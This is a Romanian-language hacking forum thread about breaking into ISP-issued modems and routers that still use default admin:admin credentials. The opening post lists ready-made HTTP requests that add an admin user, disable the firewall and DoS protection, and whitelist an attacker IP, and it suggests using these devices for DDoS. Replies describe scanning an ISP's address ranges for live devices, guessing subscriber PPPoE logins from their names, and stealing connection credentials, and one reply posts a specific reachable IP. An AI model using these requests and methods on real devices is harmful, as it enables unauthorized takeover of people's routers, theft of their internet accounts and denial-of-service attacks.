Clicknet dns exploit

[al3x4ndru]

hotel regim hotelier

hotel yahoo domain

prin intermediul acestor modemuri se poate da un ddos ,deoarece au deschis si portul 23 (telnet).
alte chestii
pentru a adauga un user :

Code:

http://admin:admin@ip_vulnerabil/Action?user_id=rst_center&priv=1&pass1=parola1&pass2=parola2&id=70

dezactivare firewall

Code:

http://admin:admin@ip_vulnerabil/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

adaugare ip sa treaca de firewall

Code:

http://admin:admin@ip_vulnerabil/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gatew

[Doar userii inregistrati pot vedea linkurile. ]

[wildchild]

aceasi chestie este valabila si la routere.majoritatea care vin din fabrica au un default username si pass,il poti gasi si de pe net in manualul de instructiune.most of them buy them,plug em in and there you go,you've got internet,there's nothing left to worry about.din cate routere am accesat,cam 85% aveau parola default.

[dutzu93]

109.96.146.122 e accesibil...

[alexalghisi]

tare ideea

[catalinkm]

Tare ideea da daca iti schimba unu pass admin:admin apoi iti deregleaza username si pass de la conectare din WAN Settings esti nevoit sa resetezi modemu ca-sa te poti conecta din nou la net.

[Cipry]

dai scan cu angry ip scanner pe ipurle rtc iar la care sunt alive doar te conectezi cu mozilla , introduci user/pass (la majoritatea sunt datele default cum a zis si wildchild) si poti sa-i dai si restart la router , ii afli numele (la persoane fizice userul si parola de la net sunt compuse din nume+prenume sau doar o parte din prenume in caz ca nu se incadreaza in limita de caractere) si multe altele gen parametrii).

de obicei user dat de rtc= numeprenume_judet (abreviat) ex: B,CT etc

[AlStar]

Acu' daca tot s-a redeschis discutia despre chestia asta, as avea o curiozitate:

Quote:

O persoana A este online. O persoana B acceseaza router-ul lui A, ia datele de autentificare PPoE, reseteaza modemul, isi deschide o noua conexiune PPoE pe propriul sistem, folosind datele proaspat furate. A observa ca nu-i merge netu'. Intra repede pe interfata router-ului si introduce datele PPoE.

Va putea A sa se conecteze la Internet, cat timp contul pe care incearca sa-l acceseze prin intermediul router-ului este folosit de altcineva?

Hm..de fapt, tocmai m-am lamurit. Nu poti folosi in cont PPoE in timp ce este folosit de altcineva, indiferent de metoda de access (router/ conexiune ppoe).
Deci daca cineva iti fura datele PPoE, tre' sa astepti sa iasa ala de pe internet, ca sa revii pe internet cu datele tale.

Totusi, am o idee.. Se poate schimba parola PPoE? Cum?

[thera34]

Quote:

Originally Posted by AlStar

Totusi, am o idee.. Se poate schimba parola PPoE? Cum?

Nu poti sa o schimbi tu, ea este data de catre ISP. Numai cei de la provider o pot modifica.

[catalinkm]

Aia de la provider numeprenume_Judet ( [Doar userii inregistrati pot vedea linkurile. ] ) nu merge sa o schimbi poti sa scrii ceva la misto ca daca ii dai restart se conecteaza netul din nou.
Dar intaii sa scrii la aia de la provider sa ii schimbi parola de la modem aia cu admin:admin ([Doar userii inregistrati pot vedea linkurile. ] ).

[AlStar]

Quote:

Originally Posted by thera34

Nu poti sa o schimbi tu, ea este data de catre ISP. Numai cei de la provider o pot modifica.

Hm..sa vad cum oi face.. Poate o schimb, ca nu se stie niciodata

Quote:

Originally Posted by catalinkm

Aia de la provider numeprenume_Judet ( [Doar userii inregistrati pot vedea linkurile. ] ) nu merge sa o schimbi poti sa scrii ceva la misto ca daca ii dai restart se conecteaza netul din nou.
Dar intaii sa scrii la aia de la provider sa ii schimbi parola de la modem aia cu admin:admin ([Doar userii inregistrati pot vedea linkurile. ] ).

WTF? Ce zici ma tu acolo?